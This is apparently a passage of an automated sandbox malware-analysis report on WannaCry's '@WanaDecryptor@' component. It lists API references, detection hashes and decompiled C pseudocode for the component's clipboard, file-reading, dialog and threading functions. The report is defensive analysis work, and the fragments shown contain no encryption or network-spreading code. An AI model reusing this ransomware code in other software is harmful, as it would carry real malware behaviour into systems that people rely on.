                                  • OpenClipboard.USER32(?), ref: 00407C38
                                  • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
                                  • CloseClipboard.USER32 ref: 00407C5B
                                  • EmptyClipboard.USER32 ref: 00407C66
                                  • GlobalLock.KERNEL32(00000000), ref: 00407C79
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
                                  • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
                                  • CloseClipboard.USER32 ref: 00407CA1
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
                                  • String ID:
                                  • API String ID: 142981918-0
                                  • Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
                                  • Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
                                  • Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                  • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                  • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}





















                                  0x00407f88
                                  0x00407f96
                                  0x00407f9b
                                  0x00407f9b
                                  0x00407f9d
                                  0x00407fa9
                                  0x00407fbb
                                  0x00407fbd
                                  0x00407fc3
                                  0x00407fc5
                                  0x00407fc8
                                  0x00407fca
                                  0x00407fdd
                                  0x00407fe4
                                  0x00407ffd
                                  0x00408006
                                  0x0040800a
                                  0x0040800b
                                  0x00408011
                                  0x00408016
                                  0x00408017
                                  0x00408018
                                  0x0040801d
                                  0x00408020
                                  0x00408022
                                  0x00408027
                                  0x0040802a
                                  0x00408034
                                  0x00408035
                                  0x0040803a
                                  0x0040803b
                                  0x0040803c
                                  0x00408041
                                  0x00408044
                                  0x00408044
                                  0x00408046
                                  0x0040804e
                                  0x00408057
                                  0x00408059
                                  0x0040805d
                                  0x00408061
                                  0x0040806a
                                  0x0040806e
                                  0x00408072
                                  0x0040807b
                                  0x0040807d
                                  0x00408089
                                  0x00408093
                                  0x004080a0
                                  0x00000000
                                  0x004080a7
                                  0x00408072
                                  0x00408061
                                  0x0040804e
                                  0x004080b3

                                  APIs
                                  • fopen.MSVCRT ref: 00407FBD
                                  • fread.MSVCRT ref: 00407FDD
                                  • fclose.MSVCRT ref: 00407FE4
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                    • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                    • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy$fclosefopenfread
                                  • String ID: +++$00000000.res$s.wnry
                                  • API String ID: 3363958884-869915597
                                  • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                  • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                  • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53windowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}





                                  0x00401220
                                  0x0040122b
                                  0x0040122d
                                  0x004012c2
                                  0x004012c4
                                  0x004012cb
                                  0x004012cb
                                  0x00401241
                                  0x00401253
                                  0x0040125e
                                  0x00401266
                                  0x00401266
                                  0x00401283
                                  0x00401295
                                  0x00401295
                                  0x00401297
                                  0x0040129f
                                  0x004012b1
                                  0x004012b6
                                  0x004012b8
                                  0x004012b8
                                  0x004012b6
                                  0x00000000

                                  APIs
                                  • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                  • KillTimer.USER32(?,000003E9), ref: 0040125E
                                  • #4853.MFC42 ref: 00401266
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                  • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                  • #2379.MFC42 ref: 004012C4
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#2379#4853KillTimer
                                  • String ID:
                                  • API String ID: 178170520-0
                                  • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                  • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                  • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43windowthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}







                                  0x00403861
                                  0x0040387a
                                  0x0040387f
                                  0x00403881
                                  0x0040389f
                                  0x004038a3
                                  0x004038b5
                                  0x004038c5
                                  0x004038cb
                                  0x00000000
                                  0x004038cb
                                  0x004038d3
                                  0x00403883
                                  0x00403883
                                  0x00403885
                                  0x0040388a
                                  0x00403891
                                  0x00403891

                                  APIs
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                  • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                  • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                  Strings
                                  • Please select a host to decrypt., xrefs: 00403885
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1200CreateThread
                                  • String ID: Please select a host to decrypt.
                                  • API String ID: 3616405048-3459725315
                                  • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                  • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                  • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}








                                  0x004044c0
                                  0x004044ca
                                  0x004044cc
                                  0x004044f8
                                  0x00404503
                                  0x0040450d
                                  0x00404513
                                  0x00404519
                                  0x0040451d
                                  0x00404522
                                  0x00000000
                                  0x00404522
                                  0x004044d2
                                  0x004044d8
                                  0x004044d9
                                  0x004044e8
                                  0x004044ee
                                  0x004044ef
                                  0x004044f6
                                  0x00000000
                                  0x00000000
                                  0x0040452a

                                  APIs
                                  • GetParent.USER32(?), ref: 004044D2
                                  • #2864.MFC42(00000000), ref: 004044D9
                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                  • #2860.MFC42(00000000), ref: 004044EF
                                  • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                  • CreateFontIndirectA.GDI32(?), ref: 00404513
                                  • #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 2724197214-0
                                  • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                  • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                  • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}











                                  0x0040c066
                                  0x0040c068
                                  0x0040c073
                                  0x0040c07a
                                  0x0040c07f
                                  0x0040c08b
                                  0x0040c0a2
                                  0x0040c0ad
                                  0x0040c0b2
                                  0x0040c0b5
                                  0x0040c0ba
                                  0x0040c0bf
                                  0x0040c0e7
                                  0x0040c0f6
                                  0x0040c102
                                  0x0040c102
                                  0x0040c111
                                  0x0040c11c
                                  0x0040c129
                                  0x0040c139
                                  0x0040c13a
                                  0x0040c142
                                  0x0040c17d
                                  0x0040c189
                                  0x0040c189
                                  0x0040c195
                                  0x0040c19d
                                  0x0040c19e
                                  0x0040c1ac
                                  0x0040c1b2
                                  0x0040c1ed
                                  0x0040c1ef
                                  0x0040c1ef
                                  0x0040c1f3
                                  0x0040c1fe
                                  0x0040c1fe
                                  0x0040c208
                                  0x0040c20b
                                  0x00000000
                                  0x0040c1b4
                                  0x0040c1b6
                                  0x0040c1c2
                                  0x0040c1c2
                                  0x0040c1cc
                                  0x0040c1d3
                                  0x0040c1e3
                                  0x0040c1e3
                                  0x0040c144
                                  0x0040c146
                                  0x0040c152
                                  0x0040c152
                                  0x0040c15c
                                  0x0040c163
                                  0x0040c173
                                  0x0040c173
                                  0x0040c0c1
                                  0x0040c0c1
                                  0x0040c0ca
                                  0x0040c0d5
                                  0x0040c0d5
                                  0x0040c0db
                                  0x0040c216
                                  0x0040c21a
                                  0x0040c21f
                                  0x0040c21f
                                  0x0040c22b
                                  0x0040c238

                                  APIs
                                    • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                  • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                  • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                  • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                  • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                  • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#823
                                  • String ID:
                                  • API String ID: 3019263841-0
                                  • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                  • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                  • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}




















                                  0x00409c25
                                  0x00409c27
                                  0x00409c2c
                                  0x00409c34
                                  0x00409c4a
                                  0x00409c4b
                                  0x00409c4e
                                  0x00409c59
                                  0x00409c98
                                  0x00409c9c
                                  0x00409c5b
                                  0x00409c5b
                                  0x00409c68
                                  0x00409c6e
                                  0x00409c72
                                  0x00409c76
                                  0x00409c78
                                  0x00409c7b
                                  0x00409c84
                                  0x00409c86
                                  0x00409c86
                                  0x00409c84
                                  0x00409c8d
                                  0x00409c94
                                  0x00409c94
                                  0x00409ca0
                                  0x00409ca3
                                  0x00409ca8
                                  0x00409ce6
                                  0x00409cf0
                                  0x00409cf0
                                  0x00409caa
                                  0x00409cb2
                                  0x00409cb6
                                  0x00409cb8
                                  0x00409cb8
                                  0x00409cc0
                                  0x00409cc2
                                  0x00409cd4
                                  0x00409cd9
                                  0x00409cdd
                                  0x00409cc4
                                  0x00409cc4
                                  0x00409cc6
                                  0x00409ccd
                                  0x00409ccd
                                  0x00409cc2
                                  0x00409cf9
                                  0x00409cff
                                  0x00409d03
                                  0x00409d06
                                  0x00409d08
                                  0x00409d08
                                  0x00409d24
                                  0x00409d2f
